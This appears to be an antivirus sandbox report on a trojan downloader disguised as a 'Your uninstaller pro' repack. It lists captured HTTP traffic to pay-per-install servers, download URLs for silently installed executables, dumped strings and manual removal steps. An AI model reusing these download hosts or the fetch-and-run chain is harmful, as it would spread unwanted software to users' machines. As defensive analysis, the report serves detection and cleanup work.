Date: Sun, 21 Feb 2016 03:48:13 GMT
X-Cache: Miss from cloudfront
Via: 1.1 297739e3d74d139e546f90d2ef5a6887.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 8ldScnspZiYUz9jUOJUlhD0ghRbcXeXZROLanRVS0xReIDdN92U-Tg==MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
.........................@.................................@..........
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=1505&tid=4251180&b_typ=pe&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQg&reb=1&ic= HTTP/1.0
Host: up.sdfuus98d7f.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 1785
Connection: close
Date: Sun, 21 Feb 2016 03:48:15 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: frSZGiIYXqgV-9-rtwARHSrD2LUszysFJaYCKkrNEwOkgUJpFUGTuQ==files=4.t1=dl.u1=hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Your%2
520uninstaller%20pro%207.5%202014%20&s1=1505&s2=4251180&setupN
ame=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip
-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://get.file888desktop.info/?p=24718&d=3
0497&l=29729&dynamicname=Your%20uninstaller%20pro%207.5%202014
%20&filename=setup-1228&exeurl=http://d16oc15frjt76r.cloudfron
t.net/setup_ru.exe>=get75&ts=14533669397&con=1&prl=1&d1=4251180&d2
=1505.n2=setup-1228.exe.b2=ru.c2=sevenzip-2.s2=0.m2=1.d2=1500.t3=dl.u3
=hXXp://VVV.autojuly16-hp-download.biz/download.php?version=1.1.5.26&m
onitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS
.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=
/S&instid[appimageurl]=http://pe-sixi.com/img/icon_install
er.png.n3=Setup__2140_il340.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.
t4=dl.u4=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=
1780&productname=Your%20uninstaller%20pro%207.5%202014%20&pr
oducturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-a
p.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/s
zip_pub.png&productversion=9.20&producteula=http://sevenzip.info
/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http
://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa%2
Cita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4251180.n4=Seven
Zip-apset.exe.b4=ap.c4=sevenzip.s4=0.m4=0.d4=0.t5=dl.u5=hXXp://sub<<< skipped >>>
GET hXXp://up.skdfhi73.xyz/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= HTTP/1.1
Host: up.skdfhi73.xyz
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 527
Connection: close
Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db=
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 21 Feb 2016 03:48:16 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d84fed7fd1b1bbf46db79b86f6968b79.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DRkwaJ8_3htY3vBJG1IPTIILpSrk61j-48DBK9Zea4zQDMWysLVLjA==<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=100
6&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&a
mp;aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offe
r.php?affId={aff_id}&trackingId=6244354&instId=1
1&ho_trackingid={transaction_id}&cc={country_co
de}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db=">
here</a></body>..
GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=1505&aff_sub2=4251180&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.skdfhi73.xyz/offer.php?affId={aff_id}&trackingId=6244354&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=5.1.2600.2&db= HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 21 Feb 2016 03:48:19 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.skdfhi73.xyz/offer.php?affId=1006&trackingId=6244354&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&cc=UA&cc_typ=ho&sb=x86&wv=5.1.2600.2&db=
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02084-1026daa056dee5a7a573c02696887b-1006-4-0-0-0-0-UA-0-3131-31353035-34323531313830-30-30-30-194.242.96.218-20160220224819-_-1B02683471047E0C120A657D701F041F3C23525848594E0E472E000B0178644C5110155C2F7A110737; expires=Tue, 22 Mar 2016 03:48:19 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Tue, 15 Jan 2019 14:28:19 GMT; path=/;
tracking_id: 1026daa056dee5a7a573c02696887b
X-Robots-Tag: noindex, nofollow
Content-Length: 374
Connection: Close<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a
href="hXXp://up.skdfhi73.xyz/offer.php?affId=1006&trackingId=62443
54&instId=11&ho_trackingid=1026daa056dee5a7a573c02696887b&
cc=UA&cc_typ=ho&sb=x86&wv=5.1.2600.2&db=">here</
a>.</p>.</body></html>...
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\gKvx9Vb2eO.exe
zip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP]
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
p?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP]
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
.wd9U
nsp2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\S
program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP]
l.ddownload6.club/stub_maker.php?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP]
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201602210346
hXXp://dl.ddownload6.club/stub_maker.php?program=sevenzip&tid=4251180&pid=1505&b_typ=pe&reb=1&name=Your uninstaller pro 7.5 2014 03.2014 РС repack [130615BAP]
{{{5|||`rqo.qqp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
%original file name%.exe_668_rwx_10004000_00001000:
callback%d
gKvx9Vb2eO.exe_1724:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
O8,reA
l;`]w`#r%s
7.rdata
KERNEL32.DLL
nsArray.dll
Join
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
WS2_32.dll
NSISdl.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dExch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")RMDir: RemoveDirectory on Reboot("%s")RMDir: RemoveDirectory("%s")RMDir: RemoveDirectory invalid input("%s")Delete: DeleteFile failed("%s")Delete: DeleteFile on Reboot("%s")Delete: DeleteFile("%s")%s: failed opening file "%s"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp\cpSetup.exe"
60/SevenZip_downloader-Q3rINEYgN.exe
ninstaller%20pro%207.5%202014%20&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4251180
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp\NSISdl.dll
1.1.1.6
Software\Microsoft\Windows\CurrentVersion\Internet Settings
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp
cpSetup.exe
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp\cpSetup.exe"")ISdl.dll"
up19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4251180
57049897
oader-Q3rINEYgN.exe
cli/1456023725460/SevenZip_downloader-Q3rINEYgN.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp\gKvx9Vb2eO.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp2.tmp
gKvx9Vb2eO.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
3224608
hXXp://get.slfdio83rh.xyz/?affId=1006&appTitle=Your%20uninstaller%20pro%207.5%202014%20&s1=1505&s2=4251180&setupName=cpSetup&appVersion=2.92&instId=11
9xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=1505&subid2=4251180
nloader-Q3rINEYgN.exe
hXXp://up.sdfuus98d7f.xyz/launch_v5.php?p=sevenzip&pid=1505&tid=4251180&b_typ=pe&n=WW91ciB1bmluc3RhbGxlciBwcm8gNy41IDIwMTQg&reb=1&ic=
gKvx9Vb2eO.exe_1724_rwx_10001000_00007000:
.text
`.rdata
@.data
.rsrc
@.reloc
/key=
cpSetup.exe_1624:
.text
`.rdata
@.data
.rsrc
@.reloc
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
@le3=.dlc
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />
>%>*>/>4>=>
1 1$1(14181<1
: :@:\:`:
Amscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
Kernel32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj4.tmp\cpSetup.exe
cpSetup.exe_1624_rwx_003A0000_0000C000:
.text
`.rdata
@.data
.rsrc
@.reloc
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
%d.%d.%d.%d
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0004582e.a (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0004532d.a (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0JP3NNO3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EYJ5XCEM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TWQ30O7D\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y2SW6UK6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\cpSetup.exe (12184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\1157049897 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\S (183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\gKvx9Vb2eO.exe (9068 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.